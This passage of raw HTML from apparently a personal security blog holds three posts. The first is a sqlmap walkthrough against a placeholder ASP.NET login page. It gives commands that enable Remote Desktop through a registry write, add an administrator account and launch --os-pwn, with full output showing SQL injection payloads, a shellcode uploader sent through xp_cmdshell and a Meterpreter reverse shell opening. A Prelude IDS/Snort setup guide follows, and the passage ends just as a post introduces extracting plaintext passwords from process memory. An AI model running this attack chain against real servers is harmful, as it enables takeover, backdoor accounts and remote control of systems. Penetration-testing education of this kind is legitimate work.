--data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login --reg-add --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections --reg-type=DWORD --reg-data=0 --batch</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<h3 style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-weight: normal;">Create Users on the system using Operating system commands:</span></span></h3>
<span style="font-family: "verdana" , sans-serif;"> </span><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --os-cmd="net user newadmin test /add" --batch</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b> And finally to Pwn the remote system we will use (--os-pwn)</b></span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"> </span><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --os-pwn --batch</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<h3 style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-weight: normal;"> Output:</span></span></h3>
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">sqlmap/1.0-dev-cc3f387 - automatic SQL injection and database takeover tool</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> http://sqlmap.org</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">[*] starting at 17:44:12</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">[17:44:13] [WARNING] you did not provide the local path where Metasploit Framework is installed</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [WARNING] sqlmap is going to look for Metasploit Framework installation into the environment paths</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] Metasploit Framework has been found installed in the '/usr/local/bin' path</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] resuming back-end DBMS 'microsoft sql server'</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] testing connection to the target url</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] sqlmap got a 302 redirect to 'http://abc:80/Errorpage.aspx'. Do you want to follow? [Y/n] Y</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">sqlmap identified the following injection points with a total of 0 HTTP(s) requests:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">---</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Place: POST</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Parameter: username</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Type: error-based</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us ername=test' AND 2076=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR(113)+CHAR(121)+CHAR(5 8)+(SELECT (CASE WHEN (2076=2076) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHA R(99)+CHAR(106)+CHAR(112)+CHAR(58))) AND 'sdFw'='sdFw&password=test&Login=Login</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> Type: UNION query</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Title: Generic UNION query (NULL) - 13 columns</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us ername=-7964' UNION ALL SELECT CHAR(58)+CHAR(114)+CHAR(113)+CHAR(121)+CHAR(58)+C HAR(73)+CHAR(121)+CHAR(81)+CHAR(121)+CHAR(109)+CHAR(103)+CHAR(90)+CHAR(89)+CHAR( 110)+CHAR(79)+CHAR(58)+CHAR(99)+CHAR(106)+CHAR(112)+CHAR(58),NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=test&Login=Login</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> Type: stacked queries</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Title: Microsoft SQL Server/Sybase stacked queries</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us ername=test'; WAITFOR DELAY '0:0:5'--&password=test&Login=Login</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> Type: AND/OR time-based blind</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Title: Microsoft SQL Server/Sybase time-based blind</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us ername=test' WAITFOR DELAY '0:0:5'--&password=test&Login=Login</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">---</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] the back-end DBMS is Microsoft SQL Server</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">web server operating system: Windows 2003</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">back-end DBMS: Microsoft SQL Server 2005</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] how do you want to establish the tunnel?</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[1] TCP: Metasploit Framework (default)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[2] ICMP: icmpsh - ICMP tunneling</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">> 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] testing if current user is DBA</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:16] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:17] [INFO] testing if xp_cmdshell extended procedure is usable</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] heuristics detected web page charset 'ISO-8859-2'</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] the SQL query used returns 8 entries</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] retrieved: " "</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] retrieved: "1"</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] retrieved: "1"</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] retrieved: "1"</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] retrieved: "1"</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] xp_cmdshell extended procedure is usable</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] creating Metasploit Framework multi-stage shellcode</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] which connection type do you want to use?</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[1] Reverse TCP: Connect back from the database host to this machine (default)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[5] Bind TCP: Listen on the database host for a connection</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">> 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] which is the local address? [xyz] </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] which local port number do you want to use? [37597] 37597</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] which payload do you want to use?</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[1] Meterpreter (default)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[2] Shell</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[3] VNC</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">> 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] creation in progress .................................................................... done</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:45:54] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/shellcodeexec.x32.exe'</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:45:54] [INFO] using a custom visual basic script to write the binary file content to file 'C:\Windows\Temp\shellcodeexec.x32.exe', please wait..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:46:07] [INFO] do you want confirmation that the file 'C:\Windows\Temp\shellcodeexec.x32.exe' has been successfully written on the back-end DBMS file system? [Y/n] Y</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:46:07] [INFO] the file has been successfully written and its size is 6656 bytes, same size as the local file '/pentest/database/sqlmap/extra/shellcodeexec/windows/shellcodeexec.x32.exe'</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:46:08] [INFO] running Metasploit Framework command line interface locally, please wait..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[*] The initial module cache will be built in the background, this can take 2-5 minutes...</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> , ,</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> / \</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ((__---,,,---__))</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> (_) O O (_)_________</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> \ _ / |\</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> o_o \ M S F | \</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> \ _____ | *</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ||| WW|||</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ||| |||</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> =[ metasploit v4.5.0-dev [core:4.5 api:1.0]</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+ -- --=[ 939 exploits - 501 auxiliary - 151 post</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+ -- --=[ 251 payloads - 28 encoders - 8 nops</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> =[ svn r15798 updated 36 days ago (2012.08.30)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Warning: This copy of the Metasploit Framework was last updated 36 days ago.</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> We recommend that you update the framework at least every other day.</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> For information on updating your copy of Metasploit, please see:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> https://community.rapid7.com/docs/DOC-1306</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">PAYLOAD => windows/meterpreter/reverse_tcp</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">EXITFUNC => process</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">LPORT => 37597</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">LHOST => xyz</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[*] Started reverse handler on xyz:37597</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[*] Starting the payload handler...</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:46:49] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[*] Sending stage (764928 bytes) to xyz</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[*] Meterpreter session 1 opened (xyz:37597 -> abc:4189) at 2012-10-05 17:46:57 +0530</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">meterpreter ></span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com2tag:blogger.com,1999:blog-1982130572676896150.post-4679672717690600822012-10-04T03:17:00.002-07:002014-10-21T23:14:13.299-07:00Simple steps to set up your own Prelude IDS<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana,sans-serif;">Here are some simple steps to set up your own prelude IDS. Prelude is a Universal "Security </span><br />
<span style="font-family: Verdana,sans-serif;">Information Event Management" (SIEM) system. Prelude collects, archives, normalizes, sorts, </span><br />
<span style="font-family: Verdana,sans-serif;">aggregates, correlates and reports all security-related events independently of the product brand or </span><br />
<span style="font-family: Verdana,sans-serif;">license giving rise to such events.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Easy steps to create a structure as shown in the figure.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht__cr0K6gX6BpAjQEZFmhQJwGWq7LAWneQdvkzPH7bUK0LeRyT9UTzQ9TmZRIB7JyJVKwTXLPFt6APcCiLjj9OsHCxFgVtH5l19U1es3ZmeXOh6i2Zhdutn_5OUCprY_Dz42fzSvPYXs/s1600/diag.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht__cr0K6gX6BpAjQEZFmhQJwGWq7LAWneQdvkzPH7bUK0LeRyT9UTzQ9TmZRIB7JyJVKwTXLPFt6APcCiLjj9OsHCxFgVtH5l19U1es3ZmeXOh6i2Zhdutn_5OUCprY_Dz42fzSvPYXs/s320/diag.PNG" height="180" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prerequisites: </b>Ubuntu server 12.0 </span><br />
<span style="font-family: Verdana,sans-serif;"> Any one log monitoring system ( My fav is snort) </span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prewikka</b>.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Apt-get update</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get upgrade</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get install ntpdate</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get install dbconfig-common</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get install rng-tools (Edit vi /etc/default/rng-tools ->HRNGDEVICE=/dev/urandom)</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get install mysql-server</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prelude-Manager</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Apt-get install prelude-manager (vi /etc/default/prelude-manager ->run= yes)</span><br />
<span style="font-family: Verdana,sans-serif;">(Edit /etc/prelude-manager/prelude-manager.conf for listen and relaying)</span><br />
<span style="font-family: Verdana,sans-serif;"> change the server ip on /etc/prelude/default/client.conf</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prelude-Correlator</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Apt-get install prelude-correlator</span><br />
<span style="font-family: Verdana,sans-serif;">Registration of prelude-correlator:</span><br />
<span style="font-family: Verdana,sans-serif;">prelude-admin register prelude-correlator "idmef:w admin:r" *managerhost* --uid 0 --gid 0 (uid and gid should be taken from /etc/passwd file)</span><br />
<span style="font-family: Verdana,sans-serif;">prelude-admin registration-server prelude-manager</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prewikka</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Apt-get install apache2</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get install prewikka (add prewikka file containing following data on /etc/apache2/sites-available)</span><br />
<span style="font-family: Verdana,sans-serif;"><VirtualHost *:80></span><br />
<span style="font-family: Verdana,sans-serif;"> Setenv PREWIKKA_CONFIG "/etc/prewikka/prewikka.conf"</span><br />
<span style="font-family: Verdana,sans-serif;"><Location "/"></span><br />
<span style="font-family: Verdana,sans-serif;"> AllowOverride None</span><br />
<span style="font-family: Verdana,sans-serif;"> Options ExecCGI</span><br />
<span style="font-family: Verdana,sans-serif;"> <IfModule mod_mime.c></span><br />
<span style="font-family: Verdana,sans-serif;"> AddHandler cgi-script .cgi</span><br />
<span style="font-family: Verdana,sans-serif;"> </IfModule></span><br />
<span style="font-family: Verdana,sans-serif;"> Order allow,deny</span><br />
<span style="font-family: Verdana,sans-serif;"> Allow from all</span><br />
<span style="font-family: Verdana,sans-serif;"></Location></span><br />
<span style="font-family: Verdana,sans-serif;">Alias /prewikka/ /usr/share/prewikka/htdocs/ ScriptAlias / /usr/share/prewikka/cgi-bin/prewikka.cgi</span><br />
<span style="font-family: Verdana,sans-serif;"></VirtualHost></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"> On /usr/bin/prewikka-httpd change port 8000 to 80 and edit /etc/prewikka/prewikka.conf</span><br />
<span style="font-family: Verdana,sans-serif;">A2dissite (To disable Prewikka)</span><br />
<span style="font-family: Verdana,sans-serif;">A2ensite (To enable Prewikka)</span><br />
<span style="font-family: Verdana,sans-serif;">/etc/init.d/apache2 reload</span><br />
<span style="font-family: Verdana,sans-serif;">Change the permission of /etc/prewikka/prewikka.conf (chmod 766)</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prelude-lml</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Apt-get install prelude-lml</span><br />
<span style="font-family: Verdana,sans-serif;">Check if it’s working f9 by typing prelude-lml </span><br />
<span style="font-family: Verdana,sans-serif;">Registration of prelude-lml:</span><br />
<span style="font-family: Verdana,sans-serif;">prelude-admin register prelude-lml "idmef:w admin:r" *managerhost* --uid 0 --gid 0 (uid and gid should be taken from /etc/passwd file)</span><br />
<span style="font-family: Verdana,sans-serif;">prelude-admin registration-server prelude-manager</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Relaying</b>:</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Prelude-manager --relaying --parent-managers "x.x.x.x" </span><br />
<span style="font-family: Verdana,sans-serif;">Edit following on /etc/prelude-manager/prelude-manager.conf </span><br />
<span style="font-family: Verdana,sans-serif;">Relaying (uncomment this line)</span><br />
<span style="font-family: Verdana,sans-serif;">Parent managers = x.x.x.x</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Snort Installation</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">On snort-test machine:</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install gcc</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install g++</span><br />
<span style="font-family: Verdana,sans-serif;">from packages- libgpg-error, libgcrypt, gnutls, pcre</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install libprelude-dev</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install libpreludedb-dev</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install prelude-lml(register prelude-lml)</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install snort</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install snort-mysql</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install snort-rules-default</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install snort-common-libraries</span><br />
<span style="font-family: Verdana,sans-serif;">Go to /etc/snort/snort.conf and edit following</span><br />
<span style="font-family: Verdana,sans-serif;">Scroll down the list to the section with "# output alert_prelude: profile=snort", remove the "#é in </span><br />
<span style="font-family: Verdana,sans-serif;">front of this line and that's it.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">prelude-adduser register snort "idmef:w" <manager address> --uid snort --gid snort (on snort agent)</span><br />
<span style="font-family: Verdana,sans-serif;">prelude-adduser registration-server prelude-manager(On prelude-manager)</span><br />
<span style="font-family: Verdana,sans-serif;">snort -c /etc/snort/snort.conf</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">With this your Prelude set up should be up and running in no time. Cheers!</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ6EO7ZwjD0XVrmz-c0tXOq2Z4Usf9z5LLWGl9OJNVlHWHMaesVWPXtl-FvsPddLygvxL9jk_zHHV1K1uJ88hZzHWr9Aw23drGRME0OkExbc8df8S4P_yHMG5FqhsuSXKzPcI_V0zDfV0/s1600/Prewikka_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ6EO7ZwjD0XVrmz-c0tXOq2Z4Usf9z5LLWGl9OJNVlHWHMaesVWPXtl-FvsPddLygvxL9jk_zHHV1K1uJ88hZzHWr9Aw23drGRME0OkExbc8df8S4P_yHMG5FqhsuSXKzPcI_V0zDfV0/s320/Prewikka_1.png" height="240" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-5852215625678373722012-09-28T00:27:00.001-07:002013-06-04T03:15:48.908-07:00Plain Text memory passwords<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">This vulnerability has been in market for a very long time, but what makes me write about this actually comes from my new project which is a simple desktop application developed in VB. Wont be talking much about this application but would be describing the attack [PTMP] with few web applications on the internet.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Memory is a vital component for any application be it a web app or a simple desktop app. And most of the time our loggin passwords are kept unencrypted in the process memory. This blog would discuss the most easy ways to extract plain text passwords from any application that is not encrypting user passwords before storing in the process memory.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">More Insight!!</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Take a simple web application which would prompt a user to enter his/her userId and password in its login page ( take for eg gmail )</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjvDv28YjNMKN0oVtl_0aDC-5HKfZG-CQLilpGmU4JlX-1MBqwIuVAfh6dEVUn57gfYwVNx4NnttZBTMXs-Hss1egPd7k6Gy40w7M5wGQjMoTrj8TIAby8X0QLClWFsrHCiDyx-Gj0xfs/s1600/login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjvDv28YjNMKN0oVtl_0aDC-5HKfZG-CQLilpGmU4JlX-1MBqwIuVAfh6dEVUn57gfYwVNx4NnttZBTMXs-Hss1egPd7k6Gy40w7M5wGQjMoTrj8TIAby8X0QLClWFsrHCiDyx-Gj0xfs/s320/login.png" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
